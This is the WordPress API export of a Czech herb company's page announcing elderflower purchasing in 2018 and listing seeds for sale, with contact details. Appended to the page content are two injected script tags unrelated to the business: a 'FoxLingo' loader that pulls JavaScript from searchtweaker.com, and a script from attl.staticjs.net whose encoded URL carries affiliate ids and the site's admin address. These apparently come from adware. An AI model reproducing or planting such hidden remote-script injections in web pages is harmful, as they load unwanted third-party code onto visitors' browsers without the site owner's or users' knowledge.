{"id":16,"date":"2014-05-02T13:54:03","date_gmt":"2013-02-22T10:16:13","guid":{"rendered":"http:\/\/web.llcomp.cz\/?page_id=16"},"modified":"2018-04-17T12:20:36","modified_gmt":"2018-04-17T10:20:36","slug":"byliny","status":"publish","type":"page","link":"https:\/\/web.llcomp.cz\/?page_id=16","title":{"rendered":"Byliny"},"content":{"rendered":"<p><b>V\u00fdkup \u010derstv\u00e9ho kv\u011btu \u010dern\u00e9ho bezu 2018<br \/>\n<\/b><\/p>\n<p>\u010cerstv\u00fd\u00a0kv\u011bt \u010dern\u00e9ho bezu op\u011bt vykupujeme i v leto\u0161n\u00edm roce 2018. V p\u0159\u00edpad\u011b z\u00e1jmu n\u00e1s, pros\u00edm, neprodlen\u011b kontaktujte.<br \/>\nBli\u017e\u0161\u00ed informace na tel. \u010d. 608 254013 nebo i p\u0159es email: vykupbylin@llcomp.cz nebo info\u00a9sirupy.eu.<\/p>\n<p><b>Nab\u00eddka bylin\u00a0<\/b><\/p>\n<p>Byliny, kter\u00e9 vyu\u017eijeme do v\u00fdroby si z velk\u00e9 \u010d\u00e1sti p\u011bstujeme na na\u0161em poli a\u00a0su\u0161\u00edme zbytkov\u00fdm teplem ve vlastn\u00ed su\u0161\u00e1rn\u011b. \u010c\u00e1st bylin, kter\u00e9 nepot\u0159ebujeme do na\u0161\u00ed v\u00fdroby, zde nab\u00edz\u00edme k prodeji. Seznam bylin ze sklizn\u011b 2016-2017:<\/p>\n<p>bio semeno jitrocele<br \/>\nbio semeno je\u010dmene<\/p>\n<p>Ohledn\u011b mno\u017estv\u00ed a cen, pros\u00edm, vyu\u017eijte e-shop na <a href=\"http:\/\/sirupy.eu\/kategorie-produktu\/vsechny-produkty\/semena-osiva\/\">www.sirupy.eu<\/a> nebo n\u00e1s <a href=\"http:\/\/web.llcomp.cz\/kontakt\/\">kontaktujte zde.<\/a>)<\/p>\n<p>&nbsp;<\/p>\n<p><script id=\"FoxLingoJs\" type=\"mce-text\/javascript\">\/\/ <![CDATA[ (function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); \/\/ ]]><\/script><script src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vd2ViLmxsY29tcC5jei93cC1hZG1pbi9wb3N0LW5ldy5waHA%2FcG9zdF90eXBlPXBhZ2UiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0Ijo4MDAsImxvYWRlcl9jbGllbnRfdGltZXN0YW1wIjoxMzYxNTI4MTU5MzY3fQ%3D%3D.js\" type=\"mce-text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>V\u00fdkup \u010derstv\u00e9ho kv\u011btu \u010dern\u00e9ho bezu 2018 \u010cerstv\u00fd\u00a0kv\u011bt \u010dern\u00e9ho bezu op\u011bt vykupujeme i v leto\u0161n\u00edm roce 2018. V p\u0159\u00edpad\u011b z\u00e1jmu n\u00e1s, pros\u00edm, neprodlen\u011b kontaktujte. Bli\u017e\u0161\u00ed informace na tel. \u010d. 608 254013 nebo i p\u0159es email: vykupbylin@llcomp.cz nebo info\u00a9sirupy.eu. Nab\u00eddka bylin\u00a0 Byliny, &hellip; <a href=\"https:\/\/web.llcomp.cz\/?page_id=16\">Read more <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-16","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/16","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16"}],"version-history":[{"count":24,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/16\/revisions"}],"predecessor-version":[{"id":480,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/16\/revisions\/480"}],"wp:attachment":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}